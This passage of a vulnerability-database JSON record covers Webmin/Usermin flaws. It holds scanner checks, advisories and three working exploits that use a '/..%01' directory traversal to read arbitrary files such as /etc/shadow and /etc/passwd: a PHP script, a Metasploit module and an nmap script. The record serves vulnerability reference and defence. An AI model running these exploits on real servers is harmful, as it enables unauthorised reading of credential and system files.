= \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-admin/webmin\", unaffected: make_list(\"ge 1.290\"), vulnerable: make_list(\"lt 1.290\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"app-admin/usermin\", unaffected: make_list(\"ge 1.220\"), vulnerable: make_list(\"lt 1.220\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-02T21:10:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3392"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-10-04T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:57067", "href": "http://plugins.openvas.org/nasl.php?oid=57067", "type": "openvas", "title": "FreeBSD Ports: webmin", "sourceData": "#\n#VID 227475c2-09cb-11db-9156-000e0c2e438a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n webmin\n usermin\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.webmin.com/security.html\nhttp://www.vuxml.org/freebsd/227475c2-09cb-11db-9156-000e0c2e438a.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(57067);\n script_version(\"$Revision: 4203 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-10-04 07:30:30 +0200 (Tue, 04 Oct 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-3392\");\n script_bugtraq_id(18744);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"FreeBSD Ports: webmin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"webmin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.290\")<0) {\n txt += 'Package webmin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"usermin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.220\")<0) {\n txt += 'Package usermin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-02T21:10:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3962", "CVE-2005-3912"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-27T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:56271", "href": "http://plugins.openvas.org/nasl.php?oid=56271", "type": "openvas", "title": "FreeBSD Ports: perl", "sourceData": "#\n#VID bb33981a-7ac6-11da-bf72-00123f589060\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n perl\n webmin\n usermin\n\nCVE-2005-3912\nFormat string vulnerability in miniserv.pl Perl web server in Webmin\nbefore 1.250 and Usermin before 1.180, with syslog logging enabled,\nallows remote attackers to cause a denial of service (crash or memory\nconsumption) and possibly execute arbitrary code via format string\nspecifiers in the username parameter to the login form, which is\nultimately used in a syslog call. NOTE: the code execution might be\nassociated with an issue in Perl.\n\nCVE-2005-3962\nInteger overflow in the format string functionality (Perl_sv_vcatpvfn)\nin Perl 5.9.2 and 5.8.6 Perl allows attackers to overwrite arbitrary\nmemory and possibly execute arbitrary code via format string\nspecifiers with large values, which causes an integer wrap and leads\nto a buffer overflow, as demonstrated using format string\nvulnerabilities in Perl applications.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://dev.perl.org/perl5/news/2005/perl_patches_fix_sprintf_buffer.html\nhttp://www.dyadsecurity.com/perl-0002.html\nhttp://www.dyadsecurity.com/webmin-0001.html\nhttp://www.webmin.com/security.html\nhttp://www.vuxml.org/freebsd/bb33981a-7ac6-11da-bf72-00123f589060.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(56271);\n script_version(\"$Revision: 4148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-27 07:32:19 +0200 (Tue, 27 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2005-3912\", \"CVE-2005-3962\");\n script_bugtraq_id(15629);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: perl\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.6.0\")>=0 && revcomp(a:bver, b:\"5.6.2\")<0) {\n txt += 'Package perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"5.8.0\")>=0 && revcomp(a:bver, b:\"5.8.7_1\")<0) {\n txt += 'Package perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"webmin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.250\")<0) {\n txt += 'Package webmin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"usermin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.180\")<0) {\n txt += 'Package usermin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3912"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200512-02.xml)\n[Secunia Advisory ID:22556](https://secuniaresearch.flexerasoftware.com/advisories/22556/)\n[Secunia Advisory ID:17749](https://secuniaresearch.flexerasoftware.com/advisories/17749/)\n[Secunia Advisory ID:17878](https://secuniaresearch.flexerasoftware.com/advisories/17878/)\n[Secunia Advisory ID:17942](https://secuniaresearch.flexerasoftware.com/advisories/17942/)\n[Secunia Advisory ID:18101](https://secuniaresearch.flexerasoftware.com/advisories/18101/)\n[Secunia Advisory ID:17817](https://secuniaresearch.flexerasoftware.com/advisories/17817/)\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2005_30_sr.html\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1199\nOther Advisory URL: http://wwwnew.mandriva.com/security/advisories?name=MDKSA-2005:223\nOther Advisory URL: http://www.dyadsecurity.com/webmin-0001.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0976.html\nMail List Post: http://archives.neohapsis.com/archives/dailydave/2005-q4/0206.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-12/0015.html\nFrSIRT Advisory: ADV-2005-2660\n[CVE-2005-3912](https://vulners.com/cve/CVE-2005-3912)\n", "modified": "2005-11-29T11:19:26", "published": "2005-11-29T11:19:26", "href": "https://vulners.com/osvdb/OSVDB:21222", "id": "OSVDB:21222", "title": "Webmin/Usermin miniserv.pl Format String Remote Code Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3392"], "edition": 1, "description": "## Vulnerability Description\nWebmin / Usermin contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an unspecified error occurs during URL handling by simplify_path() function, which will disclose files content information resulting in a loss of confidentiality.\n## Solution Description\nUpgrade to Webmin version 1.290, Usermin version 1.220, or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nWebmin / Usermin contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an unspecified error occurs during URL handling by simplify_path() function, which will disclose files content information resulting in a loss of confidentiality.\n## References:\nVendor URL: http://www.webmin.com/\nVendor Specific News/Changelog Entry: http://www.webmin.com/changes.html\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200608-11.xml)\n[Secunia Advisory ID:21105](https://secuniaresearch.flexerasoftware.com/advisories/21105/)\n[Secunia Advisory ID:22556](https://secuniaresearch.flexerasoftware.com/advisories/22556/)\n[Secunia Advisory ID:20892](https://secuniaresearch.flexerasoftware.com/advisories/20892/)\n[Secunia Advisory ID:21365](https://secuniaresearch.flexerasoftware.com/advisories/21365/)\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:125\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1199\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000911.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0149.html\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000910.html\nMail List Post: http://attrition.org/pipermail/vim/2006-June/000912.html\nFrSIRT Advisory: ADV-2006-2612\n[CVE-2006-3392](https://vulners.com/cve/CVE-2006-3392)\nBugtraq ID: 18744\n", "modified": "2006-06-29T04:19:23", "published": "2006-06-29T04:19:23", "href": "https://vulners.com/osvdb/OSVDB:26772", "id": "OSVDB:26772", "type": "osvdb", "title": "Webmin/Usermin simplify_path() Failure Arbitrary File Disclosure", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "cvelist": ["CVE-2006-4542"], "edition": 1, "description": "## Vulnerability Description\nWebmin/Usermin contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered because input passed in a NULL character is not properly verified, this will disclose the source code of arbitrary CGI and Perl programs resulting in a loss of confidentiality.\n## Solution Description\nUpgrade to version 1.296 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nWebmin/Usermin contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered because input passed in a NULL character is not properly verified, this will disclose the source code of arbitrary CGI and Perl programs resulting in a loss of confidentiality.\n## References:\nVendor URL: http://www.webmin.com/\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:170-1)\n[Vendor Specific Advisory URL](http://archives.mandrivalinux.com/security-announce/2006-09/msg00013.php)\n[Secunia Advisory ID:22556](https://secuniaresearch.flexerasoftware.com/advisories/22556/)\n[Secunia Advisory ID:22114](https://secuniaresearch.flexerasoftware.com/advisories/22114/)\n[Secunia Advisory ID:21690](https://secuniaresearch.flexerasoftware.com/advisories/21690/)\n[Secunia Advisory ID:22087](https://secuniaresearch.flexerasoftware.com/advisories/22087/)\n[Related OSVDB ID: 28338](https://vulners.com/osvdb/OSVDB:28338)\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1199\nOther Advisory URL: http://www.lac.co.jp/business/sns/intelligence/SNSadvisory/89.html\nOther Advisory URL: http://jvn.jp/jp/JVN%2399776858/index.html\nKeyword: SNS Advisory No.89\n[CVE-2006-4542](https://vulners.com/cve/CVE-2006-4542)\n", "modified": "2006-09-01T04:19:07", "published": "2006-09-01T04:19:07", "href": "https://vulners.com/osvdb/OSVDB:28337", "id": "OSVDB:28337", "type": "osvdb", "title": "Webmin/Usermin NULL Character Unspecified Source Disclosure", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "cvelist": ["CVE-2006-4542"], "edition": 1, "description": "## Vulnerability Description\nWebmin/Usermin contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not sanitize input passed in a NULL character. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nUpgrade to version 1.296 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nWebmin/Usermin contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not sanitize input passed in a NULL character. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## References:\nVendor URL: http://www.webmin.com/\n[Vendor Specific Advisory URL](http://www.mandriva.com/security/advisories?name=MDKSA-2006:170-1)\n[Vendor Specific Advisory URL](http://archives.mandrivalinux.com/security-announce/2006-09/msg00013.php)\n[Secunia Advisory ID:22556](https://secuniaresearch.flexerasoftware.com/advisories/22556/)\n[Secunia Advisory ID:22114](https://secuniaresearch.flexerasoftware.com/advisories/22114/)\n[Secunia Advisory ID:21690](https://secuniaresearch.flexerasoftware.com/advisories/21690/)\n[Secunia Advisory ID:22087](https://secuniaresearch.flexerasoftware.com/advisories/22087/)\n[Related OSVDB ID: 28337](https://vulners.com/osvdb/OSVDB:28337)\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1199\nOther Advisory URL: http://www.lac.co.jp/business/sns/intelligence/SNSadvisory/89.html\nOther Advisory URL: http://jvn.jp/jp/JVN%2399776858/index.html\nKeyword: SNS Advisory No.89\n[CVE-2006-4542](https://vulners.com/cve/CVE-2006-4542)\n", "modified": "2006-09-01T04:19:07", "published": "2006-09-01T04:19:07", "href": "https://vulners.com/osvdb/OSVDB:28338", "id": "OSVDB:28338", "type": "osvdb", "title": "Webmin/Usermin NULL Character Unspecified XSS", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3912"], "description": "**Name**| webmin \n---|--- \n**CVE**| CVE-2005-3912 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Webmin Remote Exploit \n**Notes**| CVE Name: CVE-2005-3912 \nVENDOR: Webmin.com \nOSVDB: \nRepeatability: \nReferences: http://www.dyadsecurity.com/webmin-0001.html - http://www.dyadsecurity.com/perl-0002.html \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3912 \nDate public: 11-29-2005 / 12-01-2005 \nCVSS: 7.5 \n\n", "edition": 2, "modified": "2005-11-30T11:03:00", "published": "2005-11-30T11:03:00", "id": "WEBMIN", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/webmin", "title": "Immunity Canvas: WEBMIN", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:43:10", "bulletinFamily": "info", "cvelist": ["CVE-2006-3392"], "description": "### Overview \n\nWebmin and Usermin do not properly sanitize user input. This vulnerability may allow a remote, unauthenticated user to view any file on the system running Webmin or Usermin. \n\n### Description \n\n**Webmin** \n \nWebmin is popular web-based administration tool for Unix and Linux servers that allows system administrators to make changes to system processes. \n \n**Usermin** \n \nUsermin offers an interface similar to Webmin, but is designed for regular users who are not responsible for system administration tasks. \n \n**The Problem** \n \nThere is an input validation vulnerability in Usermin and Webmin that could allow a remote, unauthenticated attacker could view any file on the computer running Webmin or Usermin. \n \n--- \n \n### Impact \n\nAn attacker could read any file on the computer running Webmin or Usermin. \n \n--- \n \n### Solution \n\n**Upgrade** \nUsermin version Version 1.220 and Webmin version 1.290 have been released to address this vulnerability. \n \n--- \n \n \n**Restrict Access** \n \nRestrict access to the Webmin and Usermin servers to trusted hosts. Note that in addition to firewall and VPN access control methods, both Webmin and usermin can use SSH tunneling to provide additional layers of encryption and authorization. \n \n--- \n \n### Vendor Information\n\n999601\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Webmin __ Unknown\n\nUpdated: July 07, 2006 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis vulnerability was reported by the Webmin team.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23999601 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://secunia.com/advisories/20892/>\n * <http://www.webmin.com/uchanges-1.210.html>\n * [http://club.mandriva.com/xwiki/bin/KB/SecureSssh5?xpage=code&](<http://club.mandriva.com/xwiki/bin/KB/SecureSssh5?xpage=code&>)\n\n### Acknowledgements\n\nThe Webmin team has reported this vulnerability.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-3392](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-3392>) \n---|--- \n**Severity Metric:** | 9.53 \n**Date Public:** | 2006-06-30 \n**Date First Published:** | 2006-07-07 \n**Date Last Updated: ** | 2006-08-01 18:09 UTC \n**Document Revision: ** | 32 \n", "modified": "2006-08-01T18:09:00", "published": "2006-07-07T00:00:00", "id": "VU:999601", "href": "https://www.kb.cert.org/vuls/id/999601", "type": "cert", "title": "Webmin and Usermin fail to sanitize user input", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-01-31T15:18:44", "description": "Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit. CVE-2006-3392. Remote exploits for multiple platform", "published": "2006-07-09T00:00:00", "type": "exploitdb", "title": "Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit PHP", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3392"], "modified": "2006-07-09T00:00:00", "id": "EDB-ID:1997", "href": "https://www.exploit-db.com/exploits/1997/", "sourceData": "<?php\r\n/*\r\nName : Webmin / Usermin Arbitrary File Disclosure Vulnerability\r\nDate : 2006-06-30\r\nPatch : update to version 1.290\r\nAdvisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html\r\nCoded by joffer , http://securitydot.net\r\n*/\r\n\r\n$host = $argv[1];\r\n$port = $argv[2];\r\n$http = $argv[3];\r\n$file = $argv[4];\r\n// CHECKING THE INPUT\r\nif($host != \"\" && $port != \"\" && $http != \"\" && $file != \"\") {\r\n\r\n\r\n$z = \"/..%01\";\r\nfor ($i=0;$i<60;$i++) {\r\n $z.=\"/..%01\";\r\n}\r\n\r\n$target = $http.\"://\".$host.\":\".$port.\"/unauthenticated\".$z.\"/\".$file.\"\";\r\n\r\necho \"Attacking \".$host.\"\\n\";\r\necho \"---------------------------------\\n\";\r\n\r\n// INITIALIZING CURL SESSION TO THE TARGET\r\n\r\n$ch = curl_init();\r\n\r\ncurl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($ch, CURLOPT_URL, $target);\r\ncurl_setopt ($ch, CURLOPT_TIMEOUT, '10');\r\ncurl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);\r\n\r\n$content = curl_exec($ch);\r\ncurl_close ($ch);\r\n\r\n// CLOSING CURL\r\n\r\n// ECHOING THE CONTENT OF THE $FILE\r\necho $content;\r\n\r\necho \"---------------------------------\\n\";\r\necho \"Coded by joffer , http://securitydot.net\\n\";\r\n\r\n} else {\r\n // IF INPUT IS NOT CORRECT DISPLAY THE README\r\n echo \"Usage php webmin.php HOST PORT HTTP/HTTPS FILE\\n\";\r\n echo \"Example : php webmin.php localhost 10000 http /etc/shadow\\n\";\r\n echo \"Coded by joffer , http://securitydot.net\\n\";\r\n}\r\n\r\n?>\r\n\r\n# milw0rm.com [2006-07-09]\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/1997/"}], "metasploit": [{"lastseen": "2020-08-18T00:46:24", "description": "A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).\n", "published": "2008-01-06T22:02:01", "type": "metasploit", "title": "Webmin File Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3392"], "modified": "2020-05-17T19:51:14", "id": "MSF:AUXILIARY/ADMIN/WEBMIN/FILE_DISCLOSURE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Webmin File Disclosure',\n 'Description' => %q{\n A vulnerability has been reported in Webmin and Usermin, which can be\n exploited by malicious people to disclose potentially sensitive information.\n The vulnerability is caused due to an unspecified error within the handling\n of an URL. This can be exploited to read the contents of any files on the\n server via a specially crafted URL, without requiring a valid login.\n The vulnerability has been reported in Webmin (versions prior to 1.290) and\n Usermin (versions prior to 1.220).\n },\n 'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['OSVDB', '26772'],\n ['BID', '18744'],\n ['CVE', '2006-3392'],\n ['US-CERT-VU', '999601'],\n ['URL', 'http://secunia.com/advisories/20892/'],\n ],\n 'DisclosureDate' => 'Jun 30 2006',\n 'Actions' =>\n [\n ['Download', 'Description' => 'Download arbitrary file']\n ],\n 'DefaultAction' => 'Download'\n ))\n\n register_options(\n [\n Opt::RPORT(10000),\n OptString.new('RPATH',\n [\n true,\n \"The file to download\",\n \"/etc/passwd\"\n ]\n ),\n OptString.new('DIR',\n [\n true,\n \"Webmin directory path\",\n \"/unauthenticated\"\n ]\n ),\n ])\n end\n\n def run\n print_status(\"Attempting to retrieve #{datastore['RPATH']}...\")\n\n dir = normalize_uri(datastore['DIR'])\n uri = Rex::Text.uri_encode(dir) + \"/..%01\" * 40 + Rex::Text.uri_encode(datastore['RPATH'])\n\n res = send_request_raw({\n 'uri' => uri,\n }, 10)\n\n if (res)\n print_status(\"The server returned: #{res.code} #{res.message}\")\n print(res.body)\n else\n print_status(\"No response from the server\")\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/webmin/file_disclosure.rb"}], "nmap": [{"lastseen": "2019-05-30T17:05:31", "description": "Exploits a file disclosure vulnerability in Webmin (CVE-2006-3392) \n\nWebmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. This allows arbitrary files to be read, without requiring authentication, using \"..%01\" sequences to bypass the removal of \"../\" directory traversal sequences.\n\n## Script Arguments \n\n#### http-vuln-cve2006-3392.file \n\n<FILE>. Default: /etc/passwd\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -sV --script http-vuln-cve2006-3392 <target>\n nmap -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 10000/tcp open webmin syn-ack\n | http-vuln-cve2006-3392:\n | VULNERABLE:\n | Webmin File Disclosure\n | State: VULNERABLE (Exploitable)\n | IDs: CVE:CVE-2006-3392\n | Description:\n | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.\n | This allows arbitrary files to be read, without requiring authentication, using \"..%01\" sequences\n | to bypass the removal of \"../\" directory traversal sequences.\n | Disclosure date: 2006\n | Extra information:\n | Proof of Concept:/unauthenticated/..%01/..%01/(..)/etc/passwd\n | References:\n | http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure\n |_ http://www.exploit-db.com/exploits/1997/\n \n\n## Requires \n\n * http\n * shortport\n * stdnse\n * vulns\n\n* * *\n", "edition": 6, "published": "2014-05-04T15:00:06", "title": "http-vuln-cve2006-3392 NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3392"], "modified": "2018-05-26T21:10:36", "id": "NMAP:HTTP-VULN-CVE2006-3392.NSE", "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2006-3392.html", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nExploits a file disclosure vulnerability in Webmin (CVE-2006-3392)\n\nWebmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.\nThis allows arbitrary files to be read, without requiring authentication, using \"..%01\" sequences\nto bypass the removal of \"../\" directory traversal sequences.\n]]\n---\n-- @usage\n-- nmap -sV --script http-vuln-cve2006-3392 <target>\n-- nmap -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 10000/tcp open webmin syn-ack\n-- | http-vuln-cve2006-3392:\n-- | VULNERABLE:\n-- | Webmin File Disclosure\n-- | State: VULNERABLE (Exploitable)\n-- | IDs: CVE:CVE-2006-3392\n-- | Description:\n-- | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.\n-- | This allows arbitrary files to be read, without requiring authentication, using \"..%01\" sequences\n-- | to bypass the removal of \"../\" directory traversal sequences.\n-- | Disclosure date: 2006\n-- | Extra information:\n-- | 